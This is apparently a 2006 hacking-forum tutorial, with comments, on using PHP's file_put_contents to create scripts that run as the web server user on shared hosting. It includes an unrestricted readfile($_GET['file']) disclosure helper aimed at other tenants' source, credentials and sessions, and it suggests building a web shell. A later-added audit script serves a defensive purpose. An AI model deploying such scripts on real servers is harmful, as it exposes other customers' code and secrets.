Rooting with php

Use the PHP file_put_contents() function to run code with the web server's privileges.



This is not an exploit as such, but it can help you in some cases.

I suppose many of you know the PHP function file_put_contents(). You can easily create a file with it. What probably most of you don't know is that you can also create PHP scripts with it, and those scripts, like every file PHP writes, belong to the account your Apache server runs as and execute with its privileges. (That account is the web server user, usually nobody or www-data, not root, whatever the title suggests.)


Let's begin, shall we.

We have the following script:

<?php

// The web server process executes this script, so the file it writes is
// owned by the web server's user, not by the account that uploaded it.
$filename = "evilscript.php";
$scriptcontent = "<?php

//script code goes here

?>";

file_put_contents($filename, $scriptcontent);

?>

This will create the following file:

<?php

//script code goes here

?>

Because the web server creates this file, it is owned by the web server's user, and when we take a closer look at it we see the following:

$ ls -l evilscript.php
-rw-r--r-- 1 nobody nobody xx Jan 1 00:00 evilscript.php

Apache usually runs as the user nobody, for the record ;) (Debian-derived systems use www-data instead.)

Because the script is executed by, and owned by, the web server user, it can read and modify everything that user can. The safe_mode directive in PHP does NOT protect against this. safe_mode only checks that the owner of the running script matches the owner of the file it touches; a script the web server wrote has the same owner as every other file the web server has written (session files, uploads, cache files), so for those files the check passes. (safe_mode was never a real security boundary; it was deprecated in PHP 5.3 and removed in 5.4.)

If this script reads, say, the session data of another site hosted on the same server, you can read and modify all of it. This is a real risk in a shared hosting setup where every customer's PHP runs as the same web server user. You could also turn the script into a web shell. Note that this gives you a shell as the web server user, not root; getting from there to root needs a separate local privilege escalation.

Another big risk is that you can easily get the source code of scripts stored on the server that aren't yours, as long as the web server user is allowed to read them and to traverse the directories leading to them (with the usual 644/755 permissions, it is). Here's an example:

<?php

// Disclosure helper: returns any file the web server user can read, as plain
// text. The path is taken straight from the query string, e.g. ?file=admin.php
header('Content-Type: text/plain');
readfile($_GET['file']);

?>

If I set file to, for example, admin.php (or the path to another site's admin.php), I simply get the source of that file. And if it contains, say, password hashes or database credentials... I don't need to draw you a picture, do I ;)

I hope you've learned something from this article and find it useful.

- The_Cell
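As an added example (not part of The_Cell's article and not code from HellBoundHackers), here is the check a practitioner would run before relying on any of the above: an audit script that shows which user PHP actually executes as, who owns the files it creates, and which files belonging to other accounts that user can read. The file name whoami_audit.php, the choice to inspect the parent of its own document root plus the session directory instead of taking a path from the query string, and the Unix-only posix calls are all assumptions of this example.

```php
<?php
// Added audit script (not from The_Cell's article). It answers three questions
// on a shared host: which user does PHP really run as, who owns the files it
// creates, and which files of OTHER accounts can that user read?
//
// Assumptions (hypothetical, not from the article): Unix-like host, the posix
// extension is loaded, and the file is saved as whoami_audit.php inside your
// own document root. Served through the web server it reports the web server's
// identity; run from the CLI it reports yours. Delete it when you are done.
declare(strict_types=1);

function userName(int $uid): string
{
    $pw = posix_getpwuid($uid);
    return $pw === false ? (string) $uid : $pw['name'];
}

/**
 * Files below $dir that the current process can read but that are not owned
 * by $ownUid (the account that owns this script). Directories we cannot enter
 * are skipped, and the walk stops after $limit hits.
 */
function foreignReadable(string $dir, int $ownUid, int $limit = 50): array
{
    $hits = [];
    try {
        $it = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS),
            RecursiveIteratorIterator::LEAVES_ONLY,
            RecursiveIteratorIterator::CATCH_GET_CHILD
        );
    } catch (UnexpectedValueException $e) {
        return $hits; // $dir itself is not listable for this user
    }
    $it->setMaxDepth(3);
    foreach ($it as $f) {
        /** @var SplFileInfo $f */
        if (!$f->isFile() || !$f->isReadable()) {
            continue; // isReadable() is decided by the kernel for OUR uid
        }
        $owner = $f->getOwner();
        if ($owner === $ownUid) {
            continue; // our own files are not the interesting part
        }
        $hits[] = sprintf('%s (owner: %s)', $f->getPathname(), userName($owner));
        if (count($hits) >= $limit) {
            break;
        }
    }
    return $hits;
}

header('Content-Type: text/plain');

$euid      = posix_geteuid();
$scriptUid = (int) fileowner(__FILE__);

// A file created by this script belongs to the process user, exactly like
// evilscript.php in the article. Prove it, then clean up.
$probeUid = -1;
$probe = tempnam(sys_get_temp_dir(), 'probe_');
if ($probe !== false) {
    file_put_contents($probe, "<?php // written by uid $euid\n");
    $probeUid = (int) fileowner($probe);
    unlink($probe);
}

printf("PHP process runs as          : %s (uid %d)\n", userName($euid), $euid);
printf("This script is owned by      : %s\n", userName($scriptUid));
printf("Files it creates are owned by: %s\n", userName($probeUid));

if ($euid === 0) {
    echo "WARNING: PHP is running as root. Every file on the box is exposed.\n";
} elseif ($euid !== $scriptUid) {
    echo "Shared process user: whatever this user can read, every tenant's PHP can read.\n";
} else {
    echo "PHP runs under the account that owns the script (suexec/suPHP/FPM pool style).\n";
}

// Other accounts' files usually live one level above our own docroot. Session
// files live in session.save_path (default: the system temp dir) and are owned
// by the process user, which is why safe_mode's owner check never blocked them.
$dir        = PHP_SAPI === 'cli' ? ($argv[1] ?? dirname(__DIR__)) : dirname(__DIR__);
$sessionDir = session_save_path() !== '' ? session_save_path() : sys_get_temp_dir();

foreach ([$dir, $sessionDir] as $target) {
    $hits = foreignReadable($target, $scriptUid);
    printf("\n%d readable file(s) owned by other accounts under %s\n", count($hits), $target);
    foreach ($hits as $h) {
        echo "  $h\n";
    }
}
```

Uploaded to a shared host, this answers the question that decides whether the technique in the article works there at all. If the process user equals the script owner (suexec, suPHP, a per-account PHP-FPM pool), files written by the web server are yours alone and the foreign-file lists should come back empty. If it reports nobody or www-data together with a long list of other accounts' files, everything the article describes applies, with the web server's privileges and nothing more. Remove the script afterwards; it is a directory-listing primitive in its own right.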

Comments

mastergamer on July 28 2006 - 16:36:01
I tried this and it doesn't seem to work. I put:
<?php $filename="filereadingscript.php"; $contents="<?php header('Content-Type: text/plain'); readfile(index.php); ?>"; file_put_contents($filename, $contents); ?>


Into a script, and the script that it creates just shows:
Warning: readfile() [function.readfile]: Unable to access indexphp in /path/was/hidden/filereadingscript.php on line 1
Warning: readfile(indexphp) [function.readfile]: failed to open stream: Invalid argument in /path/was/hidden/filereadingscript.php on line 1
mastergamer on July 28 2006 - 20:08:32
I tried it on my localhost Apache server with and without the quotes and it still doesn't work. It still gives the same error. I am running Windows XP (unfortunately) with Apache 2.2.2 and PHP 5.2.0-dev. Maybe this just doesn't work on Windows......
The_Cell on July 29 2006 - 14:27:00
@Grindordie: Yeah I know, sorry. nobody is the username of Apache. This technique bypasses a lot of the safeguards that the safe_mode directive provides. @mastergamer: try VMware Player with a vmx file of SUSE or another Linux distro. You can emulate Linux this way on your Windows box ;)
beetleflux on July 31 2006 - 15:53:01
Wtf is the point with this article? You can talk about php shells as much as you want but how are you going to get the code on the server? You don't say a word about that. So this article is useless.
The_Cell on August 01 2006 - 20:09:21
I quote myself: "another site stored on the server". I thought it would be obvious that I'm talking about a shared hosting environment where you have a site on the server and want to get other people's source etc. If my article was useless it wouldn't get approved, and then your comment would be even more constructive...
Uber0n on April 24 2007 - 13:07:50
Great article B) and also lol@beetleflux